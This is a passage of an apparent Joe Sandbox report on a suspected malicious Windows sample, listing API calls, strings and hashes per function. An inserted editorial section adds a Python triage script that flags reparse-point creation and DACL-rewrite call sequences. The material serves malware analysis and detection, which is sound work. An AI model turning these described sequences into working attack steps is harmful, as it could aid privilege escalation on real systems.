                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
                                                            • Opcode ID: 04865861c4ac71acfac2b1a9784f8061a38884b8083bdb2d0b6e2d0dbd5bf973
                                                            • Instruction ID: c3987d62a782f49cd98154ed89839c61bbd4e62a58467f9b3d8e8bd9d76db644
                                                            • Opcode Fuzzy Hash: 04865861c4ac71acfac2b1a9784f8061a38884b8083bdb2d0b6e2d0dbd5bf973
                                                            • Instruction Fuzzy Hash: B0518D31A00709AFDB21EFA8CD89B7EBBF5FF04704F004929E682E25A1D774A904CB50
                                                            APIs
                                                            • _memset.LIBCMT ref: 0089A4C8
                                                            • DestroyWindow.USER32(?,?), ref: 0089A542
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0089A5BC
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0089A5DE
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0089A5F1
                                                            • DestroyWindow.USER32(00000000), ref: 0089A613
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00810000,00000000), ref: 0089A64A
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0089A663
                                                            • GetDesktopWindow.USER32 ref: 0089A67C
                                                            • GetWindowRect.USER32(00000000), ref: 0089A683
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0089A69B
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0089A6B3
                                                              • Part of subcall function 008125DB: GetWindowLongW.USER32(?,000000EB), ref: 008125EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: ba2f8c8d5a7c0e56d69f32d87aac1fbfadd679ce83acc340c4850f2c5562f092
                                                            • Instruction ID: 4f5abbfe3b161c54ca0d9f12064be1e1ef9d62eb037bcdfd11651d31798fef42
                                                            • Opcode Fuzzy Hash: ba2f8c8d5a7c0e56d69f32d87aac1fbfadd679ce83acc340c4850f2c5562f092
                                                            • Instruction Fuzzy Hash: 8171BD71144209AFDB29EF28CC45FA67BE9FB98304F08052DF985C72A1D774E951CB52
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 0089C917
                                                              • Part of subcall function 0089ADF1: ClientToScreen.USER32(?,?), ref: 0089AE1A
                                                              • Part of subcall function 0089ADF1: GetWindowRect.USER32(?,?), ref: 0089AE90
                                                              • Part of subcall function 0089ADF1: PtInRect.USER32(?,?,0089C304), ref: 0089AEA0
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0089C980
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0089C98B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0089C9AE
                                                            • _wcscat.LIBCMT ref: 0089C9DE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0089C9F5
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0089CA0E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0089CA25
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0089CA47
                                                            • DragFinish.SHELL32(?), ref: 0089CA4E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0089CB41
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                            • API String ID: 169749273-3440237614
                                                            • Opcode ID: d01a4b51ffb7e3a526e2584d2e2ae84a723911be54e1e936741f5b5b7ccdbd79
                                                            • Instruction ID: 7f8a8c64b03e1cb3b295641d13a3146adb85001405cfcaba061f978f1b95bbdd
                                                            • Opcode Fuzzy Hash: d01a4b51ffb7e3a526e2584d2e2ae84a723911be54e1e936741f5b5b7ccdbd79
                                                            • Instruction Fuzzy Hash: C3615971108300AFC705EF64DC85D9BBBE8FF88710F040A2EF691D22A1EB309A49CB52
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 008946AB
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008946F6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: eb710b559b6e252d51c56cb02529c349750aa533d3f875416ba3ed56bb016b5d
                                                            • Instruction ID: 929effb461f29aa3a3a724b0d3dfa9b38ce957d22bd2b982662de3115cdee9dd
                                                            • Opcode Fuzzy Hash: eb710b559b6e252d51c56cb02529c349750aa533d3f875416ba3ed56bb016b5d
                                                            • Instruction Fuzzy Hash: BC917C742047059BCB14EF58C461E6ABBA5FF94314F04446CE896DB3A2DB34ED4ACB82
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0089BB6E
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00899431), ref: 0089BBCA
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0089BC03
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0089BC46
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0089BC7D
                                                            • FreeLibrary.KERNEL32(?), ref: 0089BC89
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0089BC99
                                                            • DestroyIcon.USER32(?,?,?,?,?,00899431), ref: 0089BCA8
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0089BCC5
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0089BCD1
                                                              • Part of subcall function 0083313D: __wcsicmp_l.LIBCMT ref: 008331C6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: 0e8751124e659701f60522bf2797e76bc4a944c4634148e827ad2368ec74a56f
                                                            • Instruction ID: 25d1bd2f262ed730825ae2e9950d27d5f9c0dba7e0602860e44b9c6023b62a8c
                                                            • Opcode Fuzzy Hash: 0e8751124e659701f60522bf2797e76bc4a944c4634148e827ad2368ec74a56f
                                                            • Instruction Fuzzy Hash: 4161CC71600619BAEF14EF64DD86FBE77A8FF08720F14411AF915D61C1DB74A990CBA0
                                                            APIs
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • CharLowerBuffW.USER32(?,?), ref: 0087A636
                                                            • GetDriveTypeW.KERNEL32 ref: 0087A683
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0087A6CB
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0087A702
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0087A730
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: f1cd73d53aaaced5659410d06477a687ca867094269db7811f53cdaa69eaba75
                                                            • Instruction ID: dc337ead8ab6e6d84b4e473df174bd196aa87eabddc9eb588ade3c6aad027840
                                                            • Opcode Fuzzy Hash: f1cd73d53aaaced5659410d06477a687ca867094269db7811f53cdaa69eaba75
                                                            • Instruction Fuzzy Hash: 4A5139711042089FC704EF24C891DAAB7F8FF94758F04896DF89A97251DB35EE4ACB42
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0087A47A
                                                            • __swprintf.LIBCMT ref: 0087A49C
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0087A4D9
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0087A4FE
                                                            • _memset.LIBCMT ref: 0087A51D
                                                            • _wcsncpy.LIBCMT ref: 0087A559
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0087A58E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0087A599
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0087A5A2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0087A5AC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: ef58b0b8a9b7b253417faa4c037f44d9f089843d7a3a96688f4b623dbdc337b5
                                                            • Instruction ID: 75d6902646c5d6a9ba82b3c9db3a2272bbfb4058767e55a50a04144cf1093241
                                                            • Opcode Fuzzy Hash: ef58b0b8a9b7b253417faa4c037f44d9f089843d7a3a96688f4b623dbdc337b5
                                                            • Instruction Fuzzy Hash: B831B0B2500109ABDB259FA4DC49FEF77BCFF88701F1440B6FA08D2165E77496448B65
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 0087DC7B
                                                            • _wcscat.LIBCMT ref: 0087DC93
                                                            • _wcscat.LIBCMT ref: 0087DCA5
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0087DCBA
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0087DCCE
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0087DCE6
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0087DD00
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0087DD12
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: 159d78dd08d4d45470d71c0bd9b6dba348881d913e4e67673031fc8e76956a19
                                                            • Instruction ID: d3ba40494e1ae32c2097f3088cbdde36d110b3faebf11fda327cf59153b887b0
                                                            • Opcode Fuzzy Hash: 159d78dd08d4d45470d71c0bd9b6dba348881d913e4e67673031fc8e76956a19
                                                            • Instruction Fuzzy Hash: CB816E715043459FCB24EF28C8859AAB7F8FF89314F19C82AF889C7255E770E984CB52
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0089C4EC
                                                            • GetFocus.USER32 ref: 0089C4FC
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0089C507
                                                            • _memset.LIBCMT ref: 0089C632
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0089C65D
                                                            • GetMenuItemCount.USER32(?), ref: 0089C67D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 0089C690
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0089C6C4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0089C70C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0089C744
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0089C779
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: 4cce61e8f208e6ad51fb2bed7c214446b0ae7ef90a2a2fb055a2177024d63e90
                                                            • Instruction ID: 22c4ee02e872efd09073cc4df0af443b36a9669b5e83c5e443643ff0376dbf37
                                                            • Opcode Fuzzy Hash: 4cce61e8f208e6ad51fb2bed7c214446b0ae7ef90a2a2fb055a2177024d63e90
                                                            • Instruction Fuzzy Hash: C2818E70208305AFDB11EF58C984A6BBBE8FB98314F18492EF995D7291D731D905CBA2
                                                            APIs
                                                              • Part of subcall function 0086874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00868766
                                                              • Part of subcall function 0086874A: GetLastError.KERNEL32(?,0086822A,?,?,?), ref: 00868770
                                                              • Part of subcall function 0086874A: GetProcessHeap.KERNEL32(00000008,?,?,0086822A,?,?,?), ref: 0086877F
                                                              • Part of subcall function 0086874A: HeapAlloc.KERNEL32(00000000,?,0086822A,?,?,?), ref: 00868786
                                                              • Part of subcall function 0086874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0086879D
                                                              • Part of subcall function 008687E7: GetProcessHeap.KERNEL32(00000008,00868240,00000000,00000000,?,00868240,?), ref: 008687F3
                                                              • Part of subcall function 008687E7: HeapAlloc.KERNEL32(00000000,?,00868240,?), ref: 008687FA
                                                              • Part of subcall function 008687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00868240,?), ref: 0086880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00868458
                                                            • _memset.LIBCMT ref: 0086846D
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0086848C
                                                            • GetLengthSid.ADVAPI32(?), ref: 0086849D
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 008684DA
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008684F6
                                                            • GetLengthSid.ADVAPI32(?), ref: 00868513
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00868522
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00868529
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0086854A
                                                            • CopySid.ADVAPI32(00000000), ref: 00868551
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00868582
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008685A8
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008685BC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 8068438c27fd5be81ce226e83ebac920ade0aa86aabb2a542ff8e459a450edbf
                                                            • Instruction ID: bb7f7d400e268df3607553fb368fc68d815d9bf2952d546dcdc59c094acd760e
                                                            • Opcode Fuzzy Hash: 8068438c27fd5be81ce226e83ebac920ade0aa86aabb2a542ff8e459a450edbf
                                                            • Instruction Fuzzy Hash: 70611A71900209EFDF14DFA4DC49AAEBBB9FF04300F14826AF919E6291DB319A15CF61
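The two function blocks above are the ones in this listing that a reviewer should decode rather than skim: the CreateFileW/DeviceIoControl sequence with the "\??\%s" string, and the GetUserObjectSecurity/AddAce/SetUserObjectSecurity sequence. The constants are documented Win32 values: 0x000900A4 is FSCTL_SET_REPARSE_POINT, 0x02200000 is FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, 0x40000000 is GENERIC_WRITE, 3 is OPEN_EXISTING, and the 4 passed to SetUserObjectSecurity is DACL_SECURITY_INFORMATION. The Python below is an added example, not part of the Joe Sandbox report and not a Joe Sandbox rule: it parses the bullet lines of an "APIs" block, decodes those constants, and flags ordered call sequences. The signature table and the labels it assigns ("reparse point creation", "DACL rewrite") are the editor's own reading of the sequences, not something the report states; the sample lines are copied from the reparse-point block above.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox report.
Added example, not part of the report and not a Joe Sandbox rule: parses the
bullet lines of an APIs block, decodes Win32 constants that occur literally in
the listing, and flags ordered call sequences (SIGNATURES is the editor's own)."""
import re
from dataclasses import dataclass

# Documented Win32 values that occur literally in the listing.
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000
FILE_FLAG_BACKUP_SEMANTICS = 0x02000000
FSCTL_NAMES = {0x900A4: "FSCTL_SET_REPARSE_POINT", 0x900A8: "FSCTL_GET_REPARSE_POINT",
               0x900AC: "FSCTL_DELETE_REPARSE_POINT"}

# One bullet: optional "Part of subcall function XXXX:", Api.MODULE, optional
# parenthesised hex args ('?' = unknown), then "ref: address".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")


@dataclass
class Call:
    api: str
    module: str
    args: list      # int for hex literals, None where the report shows '?'
    ref: int
    subcall: bool


def parse_api_block(text):
    """Turn the bullet lines of one APIs block into Call objects, in order."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:           # headings such as 'Strings' or 'Similarity'
            continue
        raw = m.group("args") or ""
        args = [None if a == "?" else int(a, 16) for a in raw.split(",") if a]
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


def decode_ioctl(code):
    """Split a CTL_CODE value into its fields (winioctl.h bit layout)."""
    return {"device_type": code >> 16, "access": (code >> 14) & 3,
            "function": (code >> 2) & 0xFFF, "method": code & 3,
            "name": FSCTL_NAMES.get(code, "unknown")}


def decode_createfile(call):
    """Name the access, disposition and flag bits of a CreateFileW call."""
    access, share, _sa, disp, flags = (call.args + [None] * 7)[1:6]
    return {"write": bool((access or 0) & GENERIC_WRITE), "share": share,
            "open_existing": disp == OPEN_EXISTING,
            "open_reparse_point": bool((flags or 0) & FILE_FLAG_OPEN_REPARSE_POINT),
            "backup_semantics": bool((flags or 0) & FILE_FLAG_BACKUP_SEMANTICS)}


# Ordered steps: API name plus an optional predicate on the decoded arguments.
# Other calls may sit between steps; a match is an ordered subsequence.
SIGNATURES = {
    "reparse point (junction/symlink) creation": [
        ("CreateFileW", lambda c: decode_createfile(c)["open_reparse_point"]),
        ("DeviceIoControl", lambda c: len(c.args) > 1 and c.args[1] == 0x900A4)],
    "DACL rewrite on a window station or desktop": [
        ("GetSecurityDescriptorDacl", None), ("AddAce", None),
        ("SetSecurityDescriptorDacl", None), ("SetUserObjectSecurity", None)],
}


def match_signatures(calls):
    """Return the names of signatures whose steps all occur, in order."""
    hits = []
    for name, steps in SIGNATURES.items():
        i = 0
        for c in calls:
            api, pred = steps[i]
            if c.api == api and (pred is None or pred(c)):
                i += 1
                if i == len(steps):
                    hits.append(name)
                    break
    return hits


# Sample input: lines copied from the CreateFileW/DeviceIoControl block above.
REPARSE_BLOCK = """
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0087A47A
• __swprintf.LIBCMT ref: 0087A49C
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0087A4D9
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0087A4FE
• _memset.LIBCMT ref: 0087A51D
• _wcsncpy.LIBCMT ref: 0087A559
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0087A58E
• CloseHandle.KERNEL32(00000000), ref: 0087A599
• RemoveDirectoryW.KERNEL32(?), ref: 0087A5A2
• CloseHandle.KERNEL32(00000000), ref: 0087A5AC
"""

if __name__ == "__main__":
    calls = parse_api_block(REPARSE_BLOCK)
    print(decode_ioctl(calls[6].args[1]), decode_createfile(calls[3]))
    print(match_signatures(calls))
```

The CreateFileW predicate matters: a DeviceIoControl with FSCTL_SET_REPARSE_POINT only makes sense on a handle opened with FILE_FLAG_OPEN_REPARSE_POINT, so the same IOCTL after an ordinary CreateFileW does not match. Paste any other "APIs" block from the report into parse_api_block to apply the same decoding; the DACL signature fires on the GetUserObjectSecurity block above without any argument predicates.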
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 008876A2
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008876AE
                                                            • CreateCompatibleDC.GDI32(?), ref: 008876BA
                                                            • SelectObject.GDI32(00000000,?), ref: 008876C7
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0088771B
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00887757
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0088777B
                                                            • SelectObject.GDI32(00000006,?), ref: 00887783
                                                            • DeleteObject.GDI32(?), ref: 0088778C
                                                            • DeleteDC.GDI32(00000006), ref: 00887793
                                                            • ReleaseDC.USER32(00000000,?), ref: 0088779E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,0089FB78), ref: 0087A0FC
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 0087A11E
                                                            • __swprintf.LIBCMT ref: 0087A177
                                                            • __swprintf.LIBCMT ref: 0087A190
                                                            • _wprintf.LIBCMT ref: 0087A246
                                                            • _wprintf.LIBCMT ref: 0087A264
                                                            Strings
                                                            Similarity
